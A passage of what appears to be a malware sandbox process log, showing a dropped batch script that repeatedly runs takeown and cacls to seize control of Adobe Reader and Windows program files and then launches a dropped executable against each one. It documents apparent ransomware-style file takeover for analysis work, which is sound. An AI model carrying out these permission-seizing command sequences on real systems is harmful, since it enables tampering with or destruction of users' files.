  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  - Loads dropped DLL
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1448
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:1460
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1980
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""
  2⤵
  - Loads dropped DLL
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Graph.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Graph.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1460
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  - Loads dropped DLL
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "eula.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "eula.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  - Loads dropped DLL
  PID:972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    - Modifies file permissions
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1440
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Genko_2.jtp" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Genko_2.jtp" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    - Modifies file permissions
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:1884
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:904
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Journal.exe" -nobanner
    3⤵
    PID:1028
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Journal.exe" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      PID:1220
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:1980
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:616
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:824
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:1096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    - Modifies file permissions
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:1452
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:1408
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    - Modifies file permissions
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:1452
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
